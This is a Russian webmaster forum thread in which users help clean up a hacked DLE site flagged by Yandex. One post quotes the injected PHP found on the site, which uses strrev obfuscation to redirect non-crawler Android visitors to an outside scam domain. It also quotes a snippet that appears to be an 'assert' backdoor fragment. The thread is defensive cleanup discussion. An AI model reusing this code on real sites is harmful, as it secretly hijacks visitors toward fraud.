Помощник
 |
|
|
|
|
Сообщение сайта
|
 Срочно нужна помощь! Вредоносный код!, Яндекс что-то нашел на сайте, не знаю как удалить :( |
koroluk1990
|
Сообщение
#12
|
 Завсегдатай  Группа: Active User Сообщений: 832 Регистрация: 20.1.2013 Из: Лос-Анджелес, США Поблагодарили: 183 раза Репутация:  46 
 |
n0rv, спросите у AtaELL, он почистил, что-то нашел
|
 |
|
|
AtaELL
|
 7.7.2014, 20:01;
Ответить: AtaELL
Сообщение
#13
|
 Новичок Группа: User Сообщений: 22 Регистрация: 3.7.2014 Поблагодарили: 12 раз Репутация: 4
|
n0rv, проверка была неполная, но вот что нашлось
/engine/classes/mysql.php - в этом файле нашелся код Код $gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))]; if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) { if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) {header(strrev('=REREFER_PTTH&1=ru&lmth.11'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}} /engine/modules/functions.php - и здесь (возможно это и не лишнее, но раньше в дле не встречал, без него сайт работает норм) Код if( ip2long($_SERVER['HTTP_HOST']) != -1 AND ip2long($_SERVER['HTTP_HOST']) !== FALSE ) define( 'DOMAIN', null );
else define( 'DOMAIN', $domain_cookie ); $set_cookie = strrev('tressa'); |
|
|
|
|
n0rv
|
7.7.2014, 21:10;
Ответить: n0rv
Сообщение
#14
|
 Бывалый Группа: User Сообщений: 485 Регистрация: 8.1.2011 Из: Калуга Поблагодарили: 163 раза Репутация: 27
|
AtaELL, спасибо.
Идентичный код встречал так же не Вордпрес сайтах. Не знаете как защититься от это напасти? -------------------- |
|
|
|
|
AtaELL
|
7.7.2014, 21:23;
Ответить: AtaELL
Сообщение
#15
|
|
Новичок Группа: User Сообщений: 22 Регистрация: 3.7.2014 Поблагодарили: 12 раз Репутация: 4
|
n0rv, нужно закрывать дыры в сайтах, но сделать это сейчас практически невозможно, так как постоянно ставятся разные модули, дополнения, которые уже могут быть заражены либо нести потенциальную опасность, да и корявые руки админов вашего хостинга может быть причинной заражения
вероятность заражения можно уменьшить, если использовать движки, модули с проверенных источников, выставлять права доступа на файлы, размещаться у нормальных хостеров |
|
|
|
|
Mukis
|
8.7.2014, 0:05;
Ответить: Mukis
Сообщение
#16
|
 Солнце еще высоко Группа: Active User Сообщений: 1834 Регистрация: 7.11.2012 Поблагодарили: 722 раза Репутация: 147
|
koroluk1990, Если понадобится спец в этом деле - стукните мне 173973, подскажу. Занимается тем, что чистит сайты от зараз различных. Давно с ним знаком, отличный парень.
|
|
|
|
|
kolor73
|
8.7.2014, 8:59;
Ответить: kolor73
Сообщение
#17
|
|
Участник Группа: User Сообщений: 108 Регистрация: 7.7.2014 Из: Балаково Поблагодарили: 8 раз Репутация: 1
|
koroluk1990,
у меня была такая проблема я удалил виджет одна кнопка и все стало работать нормально. У меня такая проблема шаблон вордпресс делает свои кейвордс и дискрипшин плюс в плагине сео пак я их делаю. Получается дублирование это влияет на реливатность страниц, как это исправить никто не знает? -------------------- |
|
|
|
|
Telnor
|
8.7.2014, 14:11;
Ответить: Telnor
Сообщение
#18
|
 Топовый постер 
 Группа: Active User Сообщений: 6636 Регистрация: 22.7.2010 Из: CCCР Поблагодарили: 1176 раз Репутация: 410
|
Цитата(AtaELL @ 7.7.2014, 19:01)  проверка была неполная, но вот что нашлось Вы удалили его. Но не вернется ли оно снова? -------------------- |
|
|
|
|
AtaELL
|
8.7.2014, 14:23;
Ответить: AtaELL
Сообщение
#19
|
|
Новичок Группа: User Сообщений: 22 Регистрация: 3.7.2014 Поблагодарили: 12 раз Репутация: 4
|
Telnor,
Увы, не исключено. Поиск и устранение уязвимости это не 20-минутная задача, здесь нужно более масштабную работу по сайту проводить. Сообщение отредактировал AtaELL - 8.7.2014, 14:23 |
|
|
|
|
koroluk1990
|
Сообщение
#20
|
|
Завсегдатай Группа: Active User Сообщений: 832 Регистрация: 20.1.2013 Из: Лос-Анджелес, США Поблагодарили: 183 раза Репутация: 46
|
Здравствуйте, Александр!
В настоящий момент с Вашим сайтом все в порядке, он успешно прошёл перепроверку. Пометка в результатах поиска должна автоматически исчезнуть в течение нескольких часов. Ранее при проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на другие ресурсы при посещении сайта с мобильных устройств. |
|
|
|
|
Demcheg
|
24.7.2014, 12:50;
Ответить: Demcheg
Сообщение
#21
|
|
Новичок Группа: User Сообщений: 46 Регистрация: 24.10.2011 Из: Украина, Харьков Поблагодарили: 13 раз Репутация: 2
|
koroluk1990, отдельно скажу о версии DLE. Самого подобным образом взламывали - решил восстановлением из не зараженного бекапа, а затем обновлением DLE до последней версии.
Если не ошибаюсь, взламывали меня на версии DLE 10.0. |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
Нужна програмка постинга в свои сайты | 0 | kasey7 | 227 | Вчера, 19:54 автор: kasey7 |
|
Требуется помощь по сайту на "ВордПресс" Закрылся доступ в панель администратора |
15 | Tia2 | 2364 | 17.4.2024, 0:54 автор: diviner99 |
 |
 Состояние после ампутации - нужна помощьблаготворительный топик |
49 | vitvirtual | 5893 | 1.4.2024, 5:23 автор: vitvirtual |
|
Нужна ли плоская структура категорий в ИМ? | 1 | noviktamw | 1180 | 26.3.2024, 21:50 автор: c4p1t4l15t |
|
требуется помощь с themasoftware (Темапостером) | 0 | Taylor | 627 | 16.3.2024, 18:41 автор: Taylor |
|
Текстовая версия | Сейчас: 23.4.2024, 13:44 |
